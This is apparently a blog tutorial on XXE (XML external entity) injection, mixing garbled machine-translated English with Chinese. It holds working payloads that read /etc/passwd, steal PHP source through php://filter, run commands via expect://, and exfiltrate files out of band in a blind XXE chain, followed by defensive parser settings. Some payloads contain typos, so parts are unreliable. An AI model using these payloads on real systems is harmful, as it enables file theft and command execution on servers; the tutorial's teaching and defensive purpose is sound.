0x00 XML foundation
Before introducing xxe loophole, first learn about the warm care of the basics of XML. XML is designed to transmit and store data, which is the focus of the content data, the data which is separated from the HTML, is independent of the hardware and software information transfer tool.
0x01 XML document structure of the XML document structure including XML declaration, DTD Document Type Definition (optional), document element.
<!--XML申明-->
<?xml version="1.0"?>
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)> <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)> <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)> <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>Since xxe vulnerability associated with the DTD document, and therefore focuses on the concept of the DTD.
0x02 DTD
Document Type Definition (DTD) to define the legal building blocks of an XML document, it uses a series of legal elements to define the structure of the document. DTD can be declared in a row XML document (internal reference), it may also be used as an external reference.
1, declared inside DTD:
<!DOCTYPE 根元素 [元素声明]>
2, reference to an external DTD:
<!DOCTYPE 根元素 SYSTEM "文件名">
DTD document, there are many important keywords as follows:
- DOCTYPE (DTD declaration)
- ENTITY (statement entity)
- SYSTEM, PUBLIC (external resource request)
0x03 entity entity can be understood as a variable, it must be stated in the definition of the DTD, you can reference the variable's value in another location in the document. Entities by type divided into the following four categories:
- Built-entity (Built-in entities)
- Character entities (Character entities)
- General entity (General entities)
- Parameter entity (Parameter entities)
According to reference entity, the entity can be divided into internal and external entities, take a look at how these entities are affirmed.
Complete entity class can refer to DTD - Entities ( https://www.tutorialspoint.com/dtd/dtd_entities.htm )
Introduction 3.1 entity class
Parameter entities use% entity name affirms% also used when referring to the name of the entity; the remaining entity name entity directly stated, with reference to the time & entity name.
Parameter entities can only be declared in the DTD, the DTD references; the rest can only be declared in the DTD entity can be referenced in the xml document.
(1) internal entity:
<!ENTITY 实体名称 "实体的值">
(2) external entity:
<!ENTITY 实体名称 SYSTEM "URI">
(3) physical parameters:
<!ENTITY % 实体名称 "实体的值">
或者
<!ENTITY % 实体名称 SYSTEM "URI">(4) Example demonstrates: the parameter entity except the entity internal entity +
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name "This is a xxe test!">]>
<foo>
<value>&name;</value>
</foo>(5) Example demonstrates: the external entity parameter entities +
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % name SYSTEM "file:///etc/passwd">
%name;
]>Note:% name (parameter entities) are referenced in the DTD, and & name (remaining entity) is referenced in the xml document.
Since xxe vulnerability is the use of a DTD external entity references loopholes lead, then look can focus on what type of external entity reference.
3.2 that the use of external entities external entity in the DTD
<!ENTITY 实体名称 SYSTEM "URI">
Grammar reference to an external entity, rather than internal entity, then what type of external entities URI can write in it?
The main ones are file, http, https, ftp, and so, of course, a different program support is not the same:
Examples of presentations:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY name SYSTEM "file:///etc/passwd">]>
<foo>
<value>&name;</value>
</foo>0x04 XXE Vulnerability
XXE stands for XML External Entity Injection vulnerability
that is xml external entity injection vulnerability, XXE vulnerabilities occur when the application parses the XML input, there is no prohibition to load external entity, leading to load malicious external file, causing the file to read, command execution, network port scanning, network sites in the attack, launched dos attacks and other hazards.
Xxe vulnerability trigger point often can upload the xml file location, no xml file upload filtering, leading to upload malicious xml file.
4.1 XXE vulnerability detection
The first step to detect whether XML will be successfully resolved:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY name "my name is nMask">]>
<root>&name;</root>If the page output my name is nMask, description xml files can be resolved.
The second step to detect whether the server supports DTD external entity references:
<?xml version=”1.0” encoding=”UTF-8”?>
<!DOCTYPE ANY [
<!ENTITY % name SYSTEM "http://localhost/index.html">
%name;
]>It can be determined by looking on their own server logs to see whether the target server, sending a request to your server's request test.xml.
If the references to support external entities, it is likely that there is xxe vulnerability.
4.2 exploits
There are many hazards xxe vulnerabilities, such as can read files, command execution, network port scanning attacks within the network website, launched dos attacks
4.2.1 read arbitrary files
Since I was doing a test on the windows, so let it be read test.txt file in the c drive contents.
If under linux, read the / etc / passwd and other sensitive data directory.
File reading any of the above to be successful, in addition to external entities referenced DTD may have, but also depends on the output information that is echo.
4.2.2 获取页面源码
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/read=conver.base64-encode/resouce=index.php">]>
<root>
<name>&xxe;</name>
</root>
返回的base64编码,即为index.php的源码
4.2.3 执行系统命令
在特殊的配置环境下,如PHP环境中PHP的expect模块被加载到了易受攻击的系统或者能处理XML的应用中,就能执行命令。
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "expect://whoami">]>
<root>
<name>&xxe;</name>
</root>4.2.4 blind xxe漏洞
对于传统的XXE来说,要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,如果没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据。
创建test.php写入以下内容:
<?php
file_put_contents("test.txt", $_GET['file']) ;
?>创建index.php写入以下内容:
<?php
$xml=<<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///C:/test.txt">
<!ENTITY % remote SYSTEM "http://localhost/test.xml">
%remote;
%all;
%send;
]>
EOF;
$data = simplexml_load_string($xml) ;
echo "<pre>" ;
print_r($data) ;
?>创建test.xml并写入以下内容:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://localhost/test.php?file=%file;'>">
当访问http://localhost/index.php, 存在漏洞的服务器会读出text.txt内容,发送给攻击者服务器上的test.php,然后把读取的数据保存到本地的test.txt中。
0x05 总结一些payload
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "file:///etc/passwd">
]>
<note>
<name>&content;</name>
</note><?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY content SYSTEM "expect://id">
]><!DOCTYPE ANY [
<!ENTITY content SYSTEM "http://localtion/xxe_file.dtd">
]>xxe_file.dtd的代码
<!ENTITY % file SYSTEM "file:///etc/flag.txt">
<!ENTITY % all "">
%all;0x06 XXE漏洞修复与防御
6.1 使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))6.2 过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC。
0x07 绕过XXE漏洞的防护
(今天脑子有点晕,明天再搞了)
参考链接
https://blog.csdn.net/Fly_hps/article/details/85228722
https://www.cnblogs.com/r00tuser/p/7255939.html#top